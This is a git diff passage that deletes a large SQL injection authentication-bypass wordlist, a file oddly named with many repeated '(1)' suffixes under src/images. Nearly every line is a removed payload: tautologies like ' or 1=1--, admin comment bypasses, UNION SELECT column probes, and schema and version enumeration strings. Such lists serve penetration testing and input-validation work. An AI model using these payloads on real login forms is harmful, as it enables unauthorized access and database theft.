-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
